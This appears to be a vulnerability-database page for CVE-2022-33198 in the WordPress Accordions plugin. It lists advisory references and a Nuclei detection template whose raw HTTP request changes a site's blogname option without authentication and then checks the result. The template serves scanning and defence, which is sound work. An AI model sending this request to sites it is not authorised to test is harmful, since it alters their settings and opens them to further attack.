| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2022-33198 | 21 Jul 202222:23 | – | circl | |
| WordPress plugin Accordions 安全漏洞 | 21 Jul 202200:00 | – | cnnvd | |
| CVE-2022-33198 | 21 Jul 202217:26 | – | cve | |
| CVE-2022-33198 WordPress Accordions plugin <= 2.0.2 - Unauthenticated WordPress Options Change vulnerability | 21 Jul 202217:26 | – | cvelist | |
| EUVD-2022-36242 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-33198 | 21 Jul 202218:15 | – | nvd | |
| CVE-2022-33198 | 21 Jul 202218:15 | – | osv | |
| WordPress Accordions plugin <= 2.0.2 - Unauthenticated WordPress Options Change vulnerability | 30 Jun 202200:00 | – | patchstack | |
| Design/Logic Flaw | 21 Jul 202218:15 | – | prion | |
| PT-2022-21736 · Biplob Adhikari · Accordion | 21 Jul 202200:00 | – | ptsecurity |
id: CVE-2022-33198
info:
name: WordPress Accordions - Unauthenticated Settings Update
author: riteshs4hu
severity: critical
description: |
Unauthenticated WordPress Options Change vulnerability in Biplob Adhikari's Accordions plugin <= 2.0.2 at WordPress.
impact: |
Attackers can modify plugin options, potentially leading to site defacement, functionality disruption, or further exploitation.
remediation: |
Update to the latest version of the plugin where the issue is fixed.
reference:
- https://vdp.patchstack.com/database/wordpress/plugin/accordions-or-faqs/vulnerability/wordpress-accordions-plugin-2-0-2-unauthenticated-wordpress-options-change-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-33198
- https://patchstack.com/database/vulnerability/accordions-or-faqs/wordpress-accordions-plugin-2-0-2-unauthenticated-wordpress-options-change-vulnerability
- https://wordpress.org/plugins/accordions-or-faqs/#developers
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-33198
cwe-id: CWE-264,NVD-CWE-Other
epss-score: 0.02654
epss-percentile: 0.83819
cpe: cpe:2.3:a:oxilab:accordions:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: oxilab
product: accordions
framework: wordpress
tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,accordions,vuln,vkev
variables:
marker: '{{rand_text_alpha(10, "abc")}}'
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-json/oxiaccordionsultimate/v1/oxi_settings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22{{marker}}%22%7D
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "oxi-confirmation-success")'
condition: and
internal: true
- raw:
- |
GET /wp-json HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"name":"{{marker}}"'
- type: status
status:
- 200
# digest: 490a0046304402206c485346c3ef15bb1521c1b31dac421e0b087eae5ace010312828365a188c84d022039e7312d05dcef3ebc1b263270e86759a968fd431f83390b4f8534b2d0987a40:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation